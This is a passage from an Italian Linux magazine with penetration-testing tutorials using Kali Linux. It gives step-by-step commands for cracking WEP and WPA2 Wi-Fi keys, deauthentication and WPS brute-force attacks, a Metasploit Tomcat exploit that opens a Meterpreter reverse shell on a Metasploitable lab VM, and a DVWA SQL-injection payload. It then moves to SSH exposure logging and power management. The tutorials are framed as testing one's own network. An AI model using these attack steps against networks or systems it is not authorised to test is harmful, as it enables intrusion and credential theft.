Se la procedura va a buon fine, siete in grado di iniettare
al router qualsiasi pacchetto di forma e dimensione. Prima
di proseguire, è però opportuno soffermarsi un attimo. I dati
che inviate, infatti, verranno rifiutati per due motivi. Il primo
perché non vi siete ancora autenticati e il secondo poiché
non avete ancora la possibilità di crittografarli in modo
corretto (non conoscete la chiave). Quello che invece
potete fare, è aggirare il primo punto, ascoltando le
richieste ARP e rigirandole nell’etere. La stessa richiesta
ARP, infatti, può essere riutilizzata più volte. Nel nostro caso
siamo riusciti a rompere la chiave a 40 bit con circa 5.000
pacchetti. Concentratevi su BSSID e canale, così da
catturare solo il flusso dati rilevante:
# airodump-ng -c 6 -b 00:de:ad:be:ef:00 -w lxpcap wlan0mon
L’opzione -w ordina ad airodump-ng di salvare i pacchetti
sul disco con prefisso lxpcap. Vengono archiviati sotto forma
di dati grezzi (.cap) e .csv, entrambi compatibili con Kismet.
Mentre state rilevando i pacchetti, aprite un altro terminale
e tentate di eseguire una falsa autenticazione al router:
# aireplay-ng -1 0 -e WEPnet -a 00:de:ad:be:ef:00 wlan0mon
Se non compare il rassicurante messaggio Association
successful :-) , è probabile che il passaggio successivo
non funzioni. Tuttavia, se tramite l’istruzione -h
aggiungete un indirizzo MAC di un dispositivo associato
con la rete WEP, dovreste riuscire a risolvere il problema.
Date il via all’attacco replay con:
# aireplay-ng -3 -b 00:de:ad:be:ef:00 wlan0mon
Generare traffico WEP potrebbe accelerare l’operazione.
Alla fine si dovrebbero vedere una serie di numeri
che aumentano esponenzialmente. Il conteggio dei
pacchetti nella sessione airodump-ng si impenna
di conseguenza. Non ci vorrà molto per recuperare
ciò di cui avete bisogno. Di solito bastano circa 10 MB
di dati, suddivisi in pacchetti da 20-30k ciascuno.
Premete Ctrl+C per fermare la raccolta e istruite
aircrack-ng per cercare chiavi da 64 bit (40+24 bit di IV) :
# aircrack-ng output-01.cap -n 64
Se avete un numero sufficiente di pacchetti, aircrack-ng
troverà quasi subito la password. Anche senza la specifica -n
64, l’attacco sarà sempre piuttosto veloce. Nel caso in cui
la procedura non funzioni al primo tentativo, lanciate di nuovo
airodump-ng e aireplay-ng. Se compare il messaggio che
vi informa di uno scollegamento in seguito all’attacco replay,
sfruttate una falsa autenticazione. I nomi dei file di output
dovranno essere incrementatati con caratteri jolly,
da specificare nella riga di comando. Per esempio, utilizzate
ogni volta una sequenza di questo genere: output*.cap. Dopo
aver scoperto una chiave WEP a 40 bit, il passo successivo
è provare con una a 104 bit (13 caratteri). La procedura
è esattamente la stessa, solo che avrete bisogno di più
pacchetti. Indicativamente ci vogliono circa 25.000 IV.
Il crack di chiavi WPA2 è una cosa del tutto diversa. Tuttavia,
se siete in grado di catturare un handshake a quattro vie,
potreste sfruttare un dictonary attack.

Anche le chiavi WEP a 128 bit possono essere scoperte in modo banale
Exploit e injection
Parlare di Kali Linux senza menzionare Metasploit
Framework (MSF) di Rapid 7 sarebbe riduttivo. Permette
di mettere in pratica diversi esperimenti, verificando svariati
tipi di vulnerabilità. Non importa se si tratta di un bug
relativo a Flash, Drupal o qualche falla in Windows.
MSF è molto flessibile e ha potenzialità che difficilmente

Wireshark: lo squalo della rete

Nei test di penetrazione, ottenere la chiave
di accesso alla rete Wi-Fi è solo l’inizio.
Oltre ad avere accesso a tutte le risorse,
è possibile decifrare il traffico che vi circola.
Wireshark, a tal proposito, è uno dei
migliori strumenti che ci siano in
circolazione. Lo trovate nel menu Sniffing
& Spoofing di Kali Linux. In alternativa,
potete installarlo in qualsiasi altra distro.
Durante la nostra prova, abbiamo già
catturato una serie di pacchetti WEP
crittografati. In realtà, una volta aperti
all’interno di Wireshark, non c’è molto da
vedere. La maggior parte dei dati è incluso
in insiemi riferiti allo standard IEE 802.11.
Troverete poi un’altra serie di richieste
di rete piuttosto noiose e per lo più
irriconoscibili. Tuttavia, una volta
configurato Wireshark con la chiave giusta,
il programma tradurrà tutto il contenuto.
Andate in Edit Preferences Protocols IEE
802.11 e spuntate la voce Enable nel box
Decryption. Fate click sul pulsante Edit,
accanto a Decryption Keys e premete +.
Assicuratevi che la tipologia sia impostata
su WEP, quindi inserite i codici ASCII di ogni
carattere della password (in via opzionale
suddivisi da due punti). La nostra chiave
a 40 bit, per esempio, corrisponde a 73: 68:
6f: 72: 74. Da ora in poi, tutti i pacchetti
verranno suddivisi per colore e saprete
dove vanno e da dove vengono.

114

riusciremo a spiegarvi del tutto in questo articolo. Avremmo
bisogno di molto più spazio. Niente, tuttavia, vi impedisce
di apprenderne le basi con Metasploitable 2 Virtual
Machine. Potete scaricarla da: http://bit.ly/
MetasploitableRapid7 o in alternativa collegarvi a http://
bit.ly/SFMetasploitable2. Scompattando il file
metasploitable-linux-2.0.0.zip troverete una macchina
virtuale VMware. La vera immagine del disco (il file VMDK)
può essere utilizzata anche in VirtualBox. Basta scegliere
l’opzione che permette di sfruttare un hard disk esistente.
Affinché la VM sia visibile in rete, dovete configurare
l’adattatore virtuale in modalità bridge anziché NAT.
Sempre in VirtualBox, la voce in questione la trovate nella
scheda Rete, all’interno del pannello Proprietà della Virtual
Machine. Se avete il DHCP attivo, non c’è da fare altro.
In caso contrario, assegnate alla distro un indirizzo IP.
Lanciate la VM ed eseguite il login con utente msfadmin
e password identica. Recuperate l’IP della piattaforma
con ip a. Se i dispositivi lavorano con indirizzo statico,
entrate in /etc/network/interfaces (la VM è basata
su Debian Lenny). In questa macchina virtuale c’è una lunga
serie di processi configurati in modo terribile e altrettanto
vulnerabile. Evitate di usarla in un’infrastruttura poco sicura.
Per gestire i servizi di Tomcat, utilizzeremo MFS. Basta
puntare il browser sulla porta 8180, preceduta dall’IP
della VM (nel nostro caso è 192.168.1.10). Questa
particolare istanza di Tomcat può essere configurata
da /manager/html. Le credenziali sono molto semplici:
tomcat/tomcat. L’applicazione consente di eseguire
arbitrariamente svariati tipi di software (impacchettati
in archivi WAR). Un’attività, questa, che di solito viene
“Per imparare a usare Kali
Linux, provatelo con una VM
che monta Windows XP”
lasciata a pochi eletti. Ricordate che non è importante come
si sfrutta un servizio. L’obiettivo è ottenere l’accesso alla
shell della macchina bersaglio. Di solito si può riuscire
aprendo una shell inversa sul PC oggetto dell’exploit.
Una volta fatto, potrete richiamare il servizio master
e inserire i comandi in base ai permessi disponibili.
Per l’occasione utilizzeremo un payload in Java. Avviate MSF
nel PC in cui è installato Kali (entrate nel menu Exploitation
Tool). Se compare un errore, aspettate qualche minuto e
riprovate. Ci vuole pazienza prima che il database venga
compilato. Quando siete pronti, nel prompt msf>, inserite:
use exploit/multi/http/tomcat_mgr_deploy
Noterete una serie di definizioni che prendono rapidamente
campo in tutto il terminale. Per approfondire, usate
l’istruzione info. Adesso configurerete alcuni parametri
per il modulo exploit. Modificate RHOST in base ai risultati
del comando ip a e in Metasploitable VM specificate:
set RHOST 192.168.1.10
set RPORT 8180
set USERNAME tomcat
set PASSWORD tomcat
set PATH /manager/html
set TARGET 1
Tranne l’ultima voce, le altre si spiegano bene da sole.
Mettere alla prova il sistema
Metasploit
Framework
vi mostra solo
la porta. Come
attraversarla
spetta solo a voi
In pratica, ordinando a MSF di creare un payload Java
in contrapposizione a uno specifico sistema operativo.
Ora siete pronti per lanciare l’attacco con l’exploit. Se tutto
va per il verso giusto, vedrete un output di questo genere:
[*] Sending stage (46089 bytes) to 192.168.1.10
[*] Meterpreter session 1 opened (192.168.1.2:4444 ->
192.168.1.10:33304)…
Segue poi un prompt meterpreter. Scrivete help per avere
la lista dettagliata dei comandi. Se utilizzate getuid, noterete
che siete riconosciuti come utente tomcat55 [/user]. Il nostro
obiettivo non è questo, ma ottenere l’accesso root.
In un’altra parte del sistema (nello specifico, il demone
distcc), c’è una vulnerabilità nella gestione dei permessi.
Potete approfondire l’argomento, leggendo la sezione
Unintentional Backdoors su https://community.rapid7.
com/docs/DOC-1875. Prima di proseguire,
vogliamo illustrare un tipico attacco da manuale.
Dovrebbe essere accessibile
da http://192.168.1.10/dvwa. Come noterete,
la sicurezza è piuttosto deludente. Appena
approdate alla pagina di login, trovate fin da subito
la password di amministrazione. Accedete,
selezionate DVWA nella colonna di sinistra e impostate sul
livello più basso il parametro di protezione per lo script.
Spostatevi nella scheda SQL Injection. La finalità è inserire
un ID utente (in questo caso dal numero 1 al 5), così da
permettere allo script di restituire nome e cognome
dell’account. DVWA è comunque vulnerabile anche
a un classico SQLi. Provate a mettere il seguente codice
nel campo User: ID: 1’ or 1=1 #. Lo script, sebbene confuso,
restituirà tutti gli ID. La causa di questo oversharing
è dovuta alla query PHP sottostante che somiglia a:
$getid = “SELECT first_name, last_name FROM users
WHERE user_id = ‘$id'”
L’ultima parte viene interpretata come WHERE user_id =
Tip
‘1’ or 1=1 #”. Il doppio quote alla fine è commentato con
Burpsite è uno dei
# e la clausola or 1=1 assicura che l’espressione WHERE migliori strumenti
sia sempre vera. Ecco che vengono restituiti i record. per verificare la
Per fortuna, PHP include svariate funzioni per presenza di bug
nelle applicazioni
disinfettare l’input dell’utente, prevenendo questo genere
Web. Purtroppo,
di disastri. Qui finisce la nostra breve incursione nel alcune delle
mondo di Kali Linux. Per prendere pieno possesso degli caratteristiche
strumenti presenti in questa distro, dovrete fare molta più interessanti sono
pratica. Provate a divertirvi con una macchina virtuale in disponibili solo
nella versione
cui è installato Windows XP. Rimarrete sconcertati da
a pagamento.
quanti danni riuscirete a fare.
115
Tutorial KaliIntrusioni
Linux
Kali Linux:
Test di sicurezza
Lo staff ha testato la sicurezza della sua rete grazie a questa ottima
distribuzione: ecco gli interessanti risultati...
K
ali Linux è il coltellino svizzero dell’hacker etico.
Nella distribuzione sono precaricati diversi tool
per effettuare test di penetrazione che possono
essere utilizzati per compromettere la propria rete al fine
di identificare i punti deboli che possono essere sfruttati
dai cracker. Il menu di Kali Linux è organizzato nell’ordine
in cui una rete viene solitamente attaccata. Inizia con dei
tool per fare test di infiltrazione e prosegue con l’analisi
delle vulnerabilità, attacchi wireless e exploitation.
Kali Linux è disponibile in diverse varianti e può essere
utilizzata come distro Live o in un ambiente virtuale.
In questo articolo vedremo alcuni dei tool più comuni
disponibili in Kali Linux per rivelare i punti deboli di una
rete. Per prima cosa vediamo quali device sono connessi
alla rete utilizzando netdiscover. Aprite un terminale
all’interno di Kali e scrivete
netdiscover -i wlan0
Questo comando invia delle richieste ARP nella rete e mostra
i risultati sullo schermo. Il processo è live e se una nuova
macchina entra nella rete apparirà sullo schermo. Una volta
Kali Linux che avete una lista di host, premete Ctrl+c per fermare la
è una distro scansione. Con la lista di host e i loro indirizzi MAC potete
basata su Debian iniziare il processo di attacco. Vorrete vedere quali porte sono
e contiene più
aperte in questi host e quale OS stanno eseguendo. Una delle
di 300 tra tool
app migliori per farlo è nmap, che può essere utilizzato con
e utility
accessibili semplicità tramite la sua interfaccia grafica, Zenmap, che
tramite un permette di lanciare diverse scansioni su qualsiasi host nella
comodo e vostra rete. Zenmap offre 10 profili di scansioni e potete
strutturato menu definirne altri utilizzando le innumerevoli opzioni che offre.
116
Fare irruzione nel Wi-Fi
Wi-Fi Protected Access (WPA) e Wi-Fi Protected Access 2
(WPA2) sono protocolli di sicurezza wireless progettati
per colmare le lacune di sicurezza di WEP. Siccome il
protocollo WPA genera dinamicamente una nuova chiave
con ogni pacchetto, previene l’analisi statistica che
permetteva di bucare WEP. Tuttavia, sono vulnerabili
ad alcune tecniche di attacco. WPA e WPA2 solitamente
sono impostate con una chiave pre-condivisa (PSK)
per assicurare comunicazioni sicure tra l’access point
e i client wireless. La PSK dovrebbe essere una frase
casuale di almeno 13 caratteri, in caso contrario sarà
possibile trovare la PSK utilizzando un attacco brute-
force confrontando la stessa con un dizionario. Questo
è l’attacco più comune. Il modo migliore per vedere
se la vostra rete wireless è difficile da attaccare o meno
è quello di cercare di entrarci. Comunque, siete avvisati:
irrompere in una rete wireless che non è di vostra
proprietà è illegale e non dovrebbe essere fatto. Andremo
a utilizzare il set di tool airmon-ng per cercare di aprire
una falla nella rete. Per iniziare abbiamo bisogno
di riuscire a intercettare o monitorare le trasmissioni
wireless; quindi, dobbiamo impostare l’interfaccia
di comunicazione di Kali in monitoraggio con:
airmon-ng start wlan0
Se il comando vi dice che ci sono dei processi che causano
problemi, uccideteli con
airmon-ng check kill
Ora rilanciate il comando airmon-ng start wlan0.
Il comando crea un’interfaccia di monitoraggio come
wlan0mon. Quando l’interfaccia è pronta usate
airodump-ng wlan0mon
per vedere l’ambiente wireless locale. Questo comando
elenca tutte le reti che riesce a trovare nel raggio della
scheda wireless in quel momento. L’output include diversi
dettagli chiave inclusi il BSSID di ogni rete oltre
all’ampiezza di banda, il canale in uso, il tipo di criptazione
e l’ESSID che dà il nome alla rete. Identificate la vostra rete
dalla lista e prendete nota del suo BSSID e del canale su
cui è in ascolto. Utilizzate queste informazioni per lanciare
airodump, per esempio:
airodump-ng -c 11 --bssid 28:03:7C:51:10:31 -w /root/
Documents/my-network wlan0mon
Questo comando creerà diversi file nella directory /root/
Documents. Ora andremo a forzare un dispositivo
 Kali
Prove di Linux Tutorial
penetrazione

Password, password, password

Il maggior problema di sicurezza sono le
password fragili. Se pensate di avere delle buone
password complesse, ci sono dei tool con i quali
potete provarle. Hydra è un tool free per
il cracking delle password tramite brute-force
e può attaccare diversi account utente alla volta.
Si può usare da riga di comando ma offre anche
un’interfaccia grafica dalla quale è possibile
creare pattern di attacco complessi. Hydra può
interagire con molti servizi inclusi HTTP, IMAP,
LDAP, POP3, RDP, SMB, VNC e molti altri.
Un altro password cracker incluso in Kali
è John the Ripper. Viene utilizzato
principalmente per rilevare password Unix deboli.
Come Hydra, anche John the Ripper è un tool
da riga di comando ma offre un’interfaccia
grafica (chiamata Johnny), che fa un ottimo
lavoro nel gestire tutte le opzioni disponibili.

a riconnettersi con il router e cattureremo l’handshake tra La Social

di loro. Prendete nota del BSSID di una stazione e lanciate
un altro terminale lasciando Airodump in esecuzione.
Nella nuova finestra di terminale lancerete quello che
è noto come deauthentication attack, nel quale un
dispositivo viene costretto a riautenticarsi con l’access
point e scambiare nuovamente le chiavi di criptazione
WPA2. Nel nuovo terminale inserite:
aireplay-ng -0 2 –a 28:03:7C:51:10:31 -c 00:1C:50:7D:44:5C
wlan0mon
In questo comando lo switch -a punta al BSSID della rete
e lo switch -c punta all’indirizzo MAC di una macchina
collegata. Potreste dover ripetere questo comando diverse
volte con macchine differenti finché non vedete diversi ACK
nella finestra del terminale che significano che l’access
point ha recepito il comando di deautenticazione inviato.
Ora tornate nella finestra di terminale originale che sta
ancora eseguendo il comando Airodump. Se l’handshake
è stato catturato noterete un numero vicino a WPA
Handshake nell’angolo in alto a destra della finestra. Ora
avete la password del router in versione criptata. Vediamo
ora come utilizzare aircrack per fare un brute-force su di
essa sfruttando una wordlist. Kali Linux è dotato di molte
wordlist e le utilizzeremo tutte finché non troveremo una
corrispondenza. L’handshake viene salvato in un file nella
directory /root/Documents con l’estensione -01.cap.
Per iniziare a cercare di rompere la password, scrivete:
aircrack-ng /root/Documents/*-01.cap -w /usr/share/
wordlists/fern-wifi/common.txt
Questo processo richiede molto tempo e probabilmente
dovrete utilizzare altre wordlist prima di trovare la
vostra password.
Rinforzare la vostra rete
Come avete visto, aggirare la sicurezza di una rete
wireless non è così difficile. A seconda della complessità
della vostra password il processo può richiedere dai 10
minuti alle 10 ore. La vostra unica difesa contro questi
attacchi è una password complessa con molti caratteri
speciali, numeri e lettere sia maiuscole sia minuscole.
Inoltre, ci sono alcune altre cose che potete fare per
far sì che chi vuole entrare nella vostra rete debba
guadagnarsela. Anche se questi accorgimenti non
vi proteggeranno da un attaccante determinato,
dovrebbero essere sufficienti per dissuadere il wardriver
medio in cerca di una Wi-Fi da scroccare. Dovreste
abilitare il filtro sul MAC address e aggiungere tutti
i MAC dei vostri dispositivi al router wireless in modo
che solo quei particolari dispositivi possano connettersi
alla vostra rete Wi-Fi. Ma sappiate che gli indirizzi MAC
possono essere imbrogliati con facilità. Dovreste anche
Engineering
Toolkit è una
raccolta di script
che possono
aiutarvi
a preparare
un potente
attacco basato
sulle vulnerabilità
dell’elemento
umano
disabilitare tutti i servizi e protocolli inutili, in particolare
quelli che sono notoriamente utilizzati per guadagnare
accessi non autorizzati, come SNMP, SSDP e uPnP.
Se un intruso guadagna accesso alla vostra rete, potete
cercare di limitare i danni che può fare disabilitando
l’amministrazione tramite Wi-Fi e permettendo
le configurazioni soltanto tramite connessione cablata.
È molto semplice anche imbrogliare gli indirizzi di rete
e far accedere le persone su un network sbagliato.
Questo può essere fatto semplicemente con un tool
chiamato Airbase che sostanzialmente trasforma
la vostra scheda Wi-Fi in uso da Kali Linux in un access
point con lo stesso nome di un’altra rete. Una volta fatto
il login, l’attaccante può catturare tutto il traffico sulla
rete compromessa inclusi username e password e tutte
le informazioni. Per evitare di cadere preda di reti
contraffatte, non entrate mai in reti che non richiedono
password e disabilitate la connessione automatica
al Wi-Fi della vostra distro. Infine, dovreste disabilitare
anche WPS. Kali Linux include il tool reaver, che può
trovare vulnerabilità WPS su molti router e fare
un brute-force su di essi per ottenere la password.
Utilizzare il tool è semplice. Utilizzate airodump
e prendete nota di BSSID e canale. Poi usate quanto
segue per cercare il PIN WPS del vostro router:
reaver -i wlan0mon -b 8D:AE:9D:65:1F:B2 -c 9 -vv
Un’opzione possibile per aggirare questo tipo di attacchi
è quella di disabilitare la funzione WPS, anche se non
sempre è sufficiente. Un’opzione migliore è quella di
passare a un firmware Open Source come DD-WRT che
non ha le funzionalità WPS. Inoltre, molti router moderni
riescono a resistere agli attacchi brute-force limitando
il numero di tentativi che si possono fare.
Comunque, anche questo limite può essere aggirato.
Per concludere, il modo migliore per rendere sicura
una rete wireless è quello di utilizzare un server di
autenticazione RADIUS assieme al protocollo WPA2.

117
Tutorial Controllare le intrusioni
Intrusioni

Controllare
le intrusioni
Lo staff vi mostrerà come creare una porta di servizio sicura
e poi esporla a Internet per scoprire se qualcuno vi sta guardando

U
n semplice fatto: quando una porta di servizio
è disponibile in Internet, qualcuno la guarda.
Vi mostreremo come verificarlo, dimostrandovi
quanto sia necessaria un po’ di sicurezza sulla propria rete,
gestendo i firewall e installando con regolarità gli
aggiornamenti. Vi mostreremo anche come rendere sicura
una porta del vostro computer, configurare un router
domestico per fare il forward di una porta su Internet e
quindi controllare i log per vedere gli IP che hanno tentato di
accedervi. Il diagramma della prossima pagina mostra un
modem/gateway residenziale (RG), che offre accesso alla
rete a tre host, visibili sulla destra. L’RG ha un hub/switch
interno e supporto Wi-Fi per offrire la connessione LAN
(Local Area Network). Usa un DHCP (Dynamic Host Control
Protocol) per distribuire gli indirizzi IP ai vari dispositivi che
si connettono al RG dalla LAN. DHCP è il protocollo
responsabile della distribuzione e gestione degli indirizzi IP
assegnati agli ospiti di una LAN. Il range di indirizzi che
utilizza il DHCP è valido soltanto per i tre dispositivi privati.
I loro indirizzi IP sono validi soltanto nel lato LAN del RG
e non è permesso propagarli in Internet. Nella parte sinistra
troviamo la WAN (Wide Area Network), la rete di
telecomunicazioni che fornisce accesso a Internet. Affinché
l’RG funzioni nella WAN deve avere un indirizzo IP pubblico
Tip che gli viene assegnato dall’Internet Service Provider (ISP).
Un range di IP pubblici viene assegnato a ogni ISP che
Potete trovare è responsabile della loro gestione. L’ISP ha il suo DHCP
un elenco delle che distribuisce e gestisce gli IP pubblici da assegnare ai
porte associate dispositivi dei clienti. NAT (Network Address Translation)
ai servizi nel file
/etc/services.
è il meccanismo utilizzato per inviare il traffico degli IP della
Ovviamente questo LAN su Internet. Le richieste di accesso a Internet
vale per Unix, non provenienti dai vari IP privati all’interno della LAN vengono
è altrettanto vero tradotte tramite NAT all’IP pubblico assegnato all’RG per
per altri SO come
essere inviate sulla Rete. Una tabella di stato all’interno
Windows.
dell’RG tiene traccia di quali richieste sono state inviate, così
le risposte ricevute da Internet possono venire tradotte
dall’IP pubblico all’IP privato e inviate al dispositivo corretto
all’interno della LAN. Per vedere l’indirizzo IP privato
assegnato al vostro computer è sufficiente aprire un
terminale e digitare il seguente comando:
sudo ifconfig
In questo articolo vedremo come esporre in Internet la porta
standard SSH (22). SSH è un protocollo di rete che offre
comunicazioni sicure tra due computer su reti insicure.
Molti amministratori di rete utilizzando SSH per fare login
da remoto sui computer. Per assicurarsi che la suite del
protocollo SSH sia installata su un computer Unix, basta
lanciare questo comando:
whereis ssh
Se questo comando ritorna una directory come /usr/bin/
ssh, il servizio è disponibile. Se il comando non ritorna
il percorso dell’SSH potete utilizzare il vostro gestore
di pacchetti per installare il programma. Su sistemi Linux
derivati da RedHat/Fedora vi basterà digitare:
sudo yum install ssh
Per i sistemi Debian based invece:
sudo apt-get install ssh
Dato che la nostra porta SSH sarà disponibile su Internet,
deve essere sicura per evitare che il sistema venga
compromesso durante il nostro test. Per potersi connettere
al servizio SSH, sono necessari un nome utente e una
password. Il nome utente utilizzato di solito per fare
i tentativi è root. Con un editor di testo aprite il file
di configurazione /etc/ssh/sshd_config e cercate la riga
contenente il testo PermitRootLogin. Assicuratevi che
quella riga contenga soltanto: PermitRootLogin no. Salvate
e uscite dal file. Un’ultima modifica alla configurazione da
eseguire per assicurarci che la porta esposta sia sicura
è quella di disabilitare tutti i tentativi di login. Create questa
voce nel file /etc/hosts.deny: ALL:ALL. TCP_Wrappers

Un posto per gli username

Facendo un cat di /etc/passwd dal terminale
vi mostrerà tutti gli account del vostro sistema.
Alcuni username sono associati a dei servizi.
I tentativi di accesso al sistema necessitano di
un username e di una password. Utilizzando
username comuni creati per servizi, applicazioni
o database presenti nel file /etc/passwd
è un modo per risolvere metà dell’equazione
username/password. È importante per un
amministratore sapere quali applicazioni sono
installate sul computer per assicurarsi che le
password di default vengano cambiate dopo
l’installazione. Un esempio di un’applicazione
che contiene un username e password di
default è MariaDB. Se quando si installa il
database non si cambiano le impostazioni di
default, gli utenti malintenzionati avranno tutti
i componenti necessari per autenticarsi.

118
 Controllare le intrusioni Tutorial
Controllare le intrusioni

Log dai servizi

Il servizio SSH ha un suo log di informazioni.
Il log contiene dettagli sull’avvio del servizio
e dati sia sulle connessioni eseguite che su
quelle fallite. I log in Linux hanno subìto
diversi cambiamenti di recente. Syslog
e rsyslog si occupano da sempre dei log, ma
ora c’è un nuovo arrivato journald. Il posto in
cui reperire i log dipende dal sistema in uso.
Se il vostro sistema utilizza un sistema di log
classico troverete un file chiamato secure da
qualche parte in /var/log/. Utilizzando un
editor di testo potete esaminare il file.
Se il vostro sistema invece utilizza journald,
dovrete utilizzare il tool journalctl tool per
leggere i file binari dei log di sistema.

è un servizio che utilizza i file /etc/hosts.deny ed /etc/
hosts.allow per restringere l’accesso a certi servizi.
Molto prima dei firewall personali, TCP_Wrappers era
la difesa principale per proteggere i servizi. ALL:ALL
disabilita tutti i servizi per tutti gli utenti. Mettendo
invece sshd:ALL si disabilitano solo i servizi SSH
a tutti gli utenti. Potreste pensare che la voce
PermitRootLogin no nel file di configurazione di SSH
sia ridondante con l’impostazione di TCP_Wrappers,
e avreste ragione. Purtroppo TCP_Wrappers sta cadendo
in disgrazia e alcune varianti di Linux hanno scelto di
non utilizzarlo più. Potete decidere di non preoccuparvi
del controllo sui servizi offerto da TCP_Wrappers e non
usarlo. Con SSH sicuro potete avviare il relativo demone
con il seguente comando. Nei derivati di RedHat:
sudo service sshd start
In quelli Debian
sudo service ssh start
Come controllo veloce per vedere se SSH è in esecuzione,
utilizzate il comando netstat per vedere se la porta 22
è in ascolto:
netstat -an | more
Il comando netstat con lo switch -an mostra le informazioni
sulle connessioni di rete senza utilizzare il DNS. Se lanciate il
comando senza lo switch n, otterrete il nome del servizio
associato alla porta anziché il numero (dal file /etc/
service). Cercate nell’output del comando netstat -an una
riga simile a
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
oppure
tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN
Se la porta è in ascolto potete provare a connettervi
utilizzando il seguente comando impostando l’IP
privato dell’host Linux.
ssh root@<indirizzo IP privato>
Se avete configurato correttamente SSH
per inibire il login dell’utente root e/o avete
impostato la sicurezza di TCP_Wrappers
come detto prima, il comando non dovrebbe
funzionare. Quindi possiamo assumere che
sia sicuro. Ora esponiamo la porta in Internet.
Lo faremo utilizzando il port forwarding,
il meccanismo che utilizzano gli RG per
prendere le richieste fatte a una porta dal lato
WAN e inviarle a uno specifico host nel lato
LAN. Come mostra il diagramma, quello che
vogliamo fare è configurare il modem per
inoltrare tutte le richieste SSH ricevute da
Internet sulla porta 22 al nostro host. I passi
da seguire per farlo dipendono dal vostro
modem e dalla versione del suo firmware,
quindi dovrete utilizzare la documentazione
del vostro modem per sapere come fare. Probabilmente
vi serviranno i permessi di root sul vostro RG per farlo.
Con l’RG e il computer configurati, lasciate la porta aperta
Tip
per alcune ore, quindi seguite la procedura illustrata qui Se il vostro
sotto per vedere se ha attirato qualche attenzione. In questo dispositivo LAN
esempio ci limiteremo a esaminare il file /var/log/secure. ha un indirizzo IP
Con i comandi appropriati potete vedere informazioni simili pubblico, il vostro
RG è configurato
da altri sistemi di log (vedi box qui sopra). in modalità PPPoE
pass-through.
Esaminare i log Gli indirizzi
Quando viene tentato l’accesso su di una porta esposta, IP privati non
vengono assegnati
viene creato un record SSH nel log, contenente l’indirizzo IP
utilizzando DHCP,
del visitatore a cui è stato rifiutato l’accesso. Basta utilizzare e gli indirizzi IP
un editor di testo per esaminare il file e vedere queste pubblici passano
informazioni. Potete poi utilizzare un servizio come https:// attraverso il RG
www.arin.net/ inserendo l’IP del vostro quasi-visitatore fino al computer.
Questo tipo di
nel campo SEARCH whois per ottenere alcune informazioni configurazione
sul suo provider. Secondo la nostra esperienza troverete rende l’utilizzo di un
tentativi di connessione da tutte le parti del mondo. firewall vitale.
Non abbiamo approfondito a sufficienza i nostri esami per
poter dire se si tratta di attacchi coordinati o di computer
compromessi di qualche sfortunato utente domestico.
Come potete vedere la nostra configurazione prevede un
firewall ma in questa circostanza serve a ben poco.
Come abbiamo visto l’RG inoltra le connessioni in arrivo
(dalla WAN alla LAN) soltanto se sono state espressamente
impostate dall’amministratore. Il firewall interviene
se decidete di controllare i servizi in uscita. Se l’RG è in
modalità PPPoE pass-through il firewall diventa vitale per
restringere gli accessi all’host. Il semplice esercizio che vi
abbiamo mostrato è servito per dimostrarvi che una porta
esposta in Internet attrae dei visitatori anche se non li avete
informati. Questo è uno dei motivi per cui la sicurezza
è vitale per proteggere i servizi dalla Rete. C’è sempre
qualcuno che vi sta guardando!

119
Tutorial Risparmio
Varieenergetico

Energia: come
è verde Linux!
L’efficienza è il primo baluardo contro le aggressioni alla nostra sicurezza:
ecco quanto si risparmia con Linux e quanto è più sicuro di conseguenza...

Intel, Toshiba e Microsoft, nato nel 1996. ACPI è andato

a sostituire il vecchio e ormai obsoleto APM (Advanced
Power Management), che offriva un ponte rudimentale tra il
BIOS e il sistema operativo. Un sistema operativo che
sfrutta l’ACPI è, tra le altre cose, in grado di reagire alla
pressione di pulsanti, o ad altri eventi, avviando lo
spegnimento o uno stato di sospensione. Grazie a ciò
Windows 98, il primo sistema operativo di questo tipo, ha
potuto eliminare il messaggio ‘È ora possibile spegnere il
computer’ dei suoi predecessori. Sfortunatamente i
costruttori di schede madri non erano particolarmente abili
nell’aderire a questi standard, il che non creava grossi
problemi a chi utilizzava i driver appositamente costruiti per
Windows offerti dai produttori, ma che portava a molte
sofferenze per gli utenti di altri sistemi operativi. Oltre ai
problemi di conformità, ACPI è stato attaccato più volte,
Linus in particolare nel 2003 lo ha definito “un disastro
totale di design in ogni senso” (come suo solito ha poi
chiesto a tutti gli impiegati Intel che hanno preso parte al
progetto di spararsi subito prima di potersi riprodurre). Le
sue obiezioni venivano dal fatto che, oltre a essere troppo
disordinato e complesso, richiedeva che il codice AML
venisse eseguito in maniera incontrollata nel kernel. Il codice
ASL (ACPI Source Language) che generava questo codice
non era disponibile, rendendo il debug un vero calvario.

A
ll’inizio la gestione del consumo energetico in Linux
era considerata un po’ come uno scherzo. Non BIOS buggati
stiamo parlando di funzionalità relativamente I kernel della serie 2.6 hanno annunciato una nuova era del
avanzate come l’ibernazione e la sospensione, no, era supporto ACPI, era il 2001, le implementazioni buggate sono
semplicemente una cosa simile a shutdown -h now, solo state bloccate e, in teoria, un normale PC Linux poteva capire
che invece di spegnere con dolcezza il sistema lo spediva in
una sorta di limbo da incubo dal quale spesso l’unico modo
per uscire era quello di fare un hard reset della macchina.
Al momento del risveglio della sfortunata macchina spesso
bisognava affrontare un lungo ed estenuante fsck (stiamo
parlando dei tempi dei filesystem pre-journal), che poteva
rilevare anche dati danneggiati. Per non parlare del fatto che
a volte l’hard disk veniva danneggiato dall’intero processo.
Anche se questi giorni sono fortunatamente alle nostre
spalle, molte persone riscontrano ancora difficoltà con la
gestione del consumo energetico. Esistono degli standard
aperti che governano la gestione del consumo (oltre che il
rilevamento dell’hardware), come lo standard BIOS ACPI Ecco come appare un DSDT corrotto: c’è effettivamente
(Advanced Configuration and Power Interface) sviluppato da un po’ troppa confusione

120
 Risparmio energetico
Efficienza Tutorial
energetica

TuxOnIce
Funzioni avanzate di sospensione e ibernazioni
sono offerte dalla patchset kernel TuxOnIce.
Questa permette, tra le altre cose, un maggior
controllo sull’immagine di ibernazione:
per esempio il posto in cui viene salvata,
la compressione e la possibilità di criptarla.
Se utilizzate la distribuzione Ubuntu potete
aggiungere il PPA TuxOnIce e installarlo così:
$ sudo add-apt-repository ppa:tuxonice/ppa
$ sudo apt-get update
$ sudo apt-get install tuxonice-userui linux-
generic-tuxonice linux-headers-generic-tuxonice
Gli utenti Arch Linux possono utilizzare il
pacchetto linux-ice disponibile su AUR, gli
altri possono scaricare la patch da www.
tuxonice.net e seguire le istruzioni relative
alla loro distribuzione per compilare il kernel
